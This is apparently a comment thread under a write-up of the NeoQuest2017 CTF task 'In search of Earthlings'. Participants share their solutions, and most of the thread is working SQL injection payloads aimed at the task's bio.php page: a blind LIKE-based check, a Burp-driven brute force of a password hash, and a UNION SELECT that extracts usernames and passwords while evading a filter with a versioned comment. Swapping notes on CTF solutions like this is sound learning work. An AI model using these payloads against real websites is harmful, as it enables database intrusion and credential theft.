[NeoQuest2017] «В поиске землян» и не только…

[BlackFan]

Мое решение выглядело примерно так:
Sigizmund'=password like _utf8mb4'14eb6641da38addf61%'#
Если в выборке возвращается Sigizmund — true.

[hackzard]

Отличный вариант! Я о нём даже и не подумал :)

[NWOcs]

Спасибо за приятные слова! Мы старались сделать NeoQUEST еще увлекательнее. Ждём на «очную ставку» ;)

[Isis]

Получить всех пользователей удалось так:
/bio/bio.php?name=Ohad%27%2bname+--+
Вытащить пароль сигизмунда удалось перебором с помощью бурпа так:

/bio/bio.php?name=Sigizmund'+and+password>0x313445423636343144413338414444463631333432344635434430353335374345323631433330344§0§+or+"s"+' 

[Isis]

Еще вариант от участника:
bio/bio.php?name=%27+group+by+1+asc+union+select+1,name,password+frOm+/*!50000nbusers*/--+-